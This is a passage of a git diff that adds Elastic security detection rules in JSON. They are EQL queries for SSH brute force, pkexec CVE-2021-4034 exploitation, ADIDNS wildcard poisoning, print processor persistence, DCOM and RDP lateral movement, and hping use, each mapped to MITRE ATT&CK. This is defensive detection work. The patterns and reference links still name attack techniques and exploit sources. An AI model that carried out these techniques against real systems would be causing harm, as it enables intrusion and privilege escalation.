attempt(s).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Infrastructure or availability issue.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure active session(s) on the host(s) are terminated as the attacker could have gained initial access to the system(s).\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, source.ip, user.name with maxspan=15s\n [authentication where host.os.type == \"linux\" and event.action in (\"ssh_login\", \"user_login\") and\n event.outcome == \"failure\" and source.ip != null and source.ip != \"0.0.0.0\" and source.ip != \"::\" ] with runs=10\n\n [authentication where host.os.type == \"linux\" and event.action in (\"ssh_login\", \"user_login\") and\n event.outcome == \"success\" and source.ip != null and source.ip != \"0.0.0.0\" and source.ip != \"::\" ]\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8cb84371-d053-4f4f-bce0-c74990e28f28", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Filebeat\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "8cb84371-d053-4f4f-bce0-c74990e28f28_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_2.json b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_2.json new file mode 100644 index 00000000000..4391a737a9c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_2.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies unusual files downloaded from outside the local network that have the potential to be abused for code execution.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "File with Suspicious Extension Downloaded", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\n \"appinstaller\", \"application\", \"appx\", \"appxbundle\", \"cpl\", \"diagcab\", \"diagpkg\", \"diagcfg\", \"manifest\",\n \"msix\", \"pif\", \"search-ms\", \"searchConnector-ms\", \"settingcontent-ms\", \"symlink\", \"theme\", \"themepack\" \n ) and file.Ext.windows.zone_identifier > 1 and\n not\n (\n file.extension : \"msix\" and \n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\Microsoft.Winget.Source*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\WinGet\\\\State\\\\defaultState\\\\Microsoft.PreIndexed.Package\\\\Microsoft.Winget.Source*\"\n )\n )\n", + "references": [ + "https://x.com/Laughing_Mantis/status/1518766501385318406", + "https://wikileaks.org/ciav7p1/cms/page_13763375.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.windows.zone_identifier", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "8d366588-cbd6-43ba-95b4-0971c3f906e5", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "8d366588-cbd6-43ba-95b4-0971c3f906e5_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json new file mode 100644 index 00000000000..947af9c0346 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via PKEXEC", + "query": "file where host.os.type == \"linux\" and file.path : \"/*GCONV_PATH*\"\n", + "references": [ + "https://seclists.org/oss-sec/2022/q1/80", + "https://haxx.in/files/blasty-vs-pkexec.c" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_2.json b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_2.json new file mode 100644 index 00000000000..f819401b4cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_2.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Adversaries may attempt to connect to a remote system over Windows Remote Desktop Protocol (RDP) to achieve lateral movement. Adversaries may avoid using the Microsoft Terminal Services Client (mstsc.exe) binary to establish an RDP connection to evade detection.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Outgoing RDP Connection by Unusual Process", + "query": "network where host.os.type == \"windows\" and\n event.action == \"connection_attempted\" and destination.port == 3389 and\n destination.ip != \"::1\" and destination.ip != \"127.0.0.1\" and\n not (\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Program Files (x86)\\\\mRemoteNG\\\\mRemoteNG.exe\",\n \"?:\\\\Program Files (x86)\\\\PRTG Network Monitor\\\\PRTG Probe.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Remote Desktop Connection Manager\\\\RDCMan.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "8e39f54e-910b-4adb-a87e-494fbba5fb65", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "8e39f54e-910b-4adb-a87e-494fbba5fb65_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8f242ffb-b191-4803-90ec-0f19942e17fd_1.json b/packages/security_detection_engine/kibana/security_rule/8f242ffb-b191-4803-90ec-0f19942e17fd_1.json new file mode 100644 index 00000000000..cdb0ad5f952 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8f242ffb-b191-4803-90ec-0f19942e17fd_1.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Active Directory Integrated DNS (ADIDNS) is one of the core components of AD DS, leveraging AD's access control and replication to maintain domain consistency. It stores DNS zones as AD objects, a feature that, while robust, introduces some security issues, such as wildcard records, mainly because of the default permission (Any authenticated users) to create DNS-named records. Attackers can create wildcard records to redirect traffic that doesn't explicitly match records contained in the zone, becoming the Man-in-the-Middle and being able to abuse DNS similarly to LLMNR/NBNS spoofing.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential ADIDNS Poisoning via Wildcard Record Creation", + "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5137\" and startsWith(winlog.event_data.ObjectDN, \"DC=*,\")\n", + "references": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/", + "https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectDN", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "8f242ffb-b191-4803-90ec-0f19942e17fd", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover the target object by default (we still need it to be configured to generate events), so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights CreateChild -InheritanceFlags Descendents -AttributeGUID e0fa1e8c-9b45-11d0-afdd-00c04fd930c9 -AuditFlags Success\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "8f242ffb-b191-4803-90ec-0f19942e17fd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_106.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_106.json new file mode 100644 index 00000000000..545b2bbcbb9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_106.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Port Monitor or Print Processor Registration Abuse", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Monitors\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Environments\\\\Windows*\\\\Print Processors\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Monitors\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Environments\\\\Windows*\\\\Print Processors\\\\*\"\n ) and registry.data.strings : \"*.dll\" and\n /* exclude SYSTEM SID - look for changes by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8f3e91c7-d791-4704-80a1-42c160d7aa27", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.010", + "name": "Port Monitors", + "reference": "https://attack.mitre.org/techniques/T1547/010/" + }, + { + "id": "T1547.012", + "name": "Print Processors", + "reference": "https://attack.mitre.org/techniques/T1547/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.010", + "name": "Port Monitors", + "reference": "https://attack.mitre.org/techniques/T1547/010/" + }, + { + "id": "T1547.012", + "name": "Print Processors", + "reference": "https://attack.mitre.org/techniques/T1547/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "8f3e91c7-d791-4704-80a1-42c160d7aa27_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_106.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_106.json new file mode 100644 index 00000000000..16032ba4924 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_106.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the ShellBrowserWindow or ShellWindows Application COM Object. This behavior may indicate an attacker abusing a DCOM application to stealthily move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows", + "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", + "references": [ + "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "8f919d4b-a5af-47ca-a594-6be59cd924a4", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.003", + "name": "Distributed Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1021/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "8f919d4b-a5af-47ca-a594-6be59cd924a4_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_108.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_108.json new file mode 100644 index 00000000000..1bfc857d378 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_108.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing.", + "false_positives": [ + "Normal use of hping is uncommon apart from security testing and research. Use by non-security engineers is very uncommon." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Hping Process Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"hping\", \"hping2\", \"hping3\")\n", + "references": [ + "https://en.wikipedia.org/wiki/Hping" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "90169566-2260-4824-b8e4-8615c3b4ed52", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper 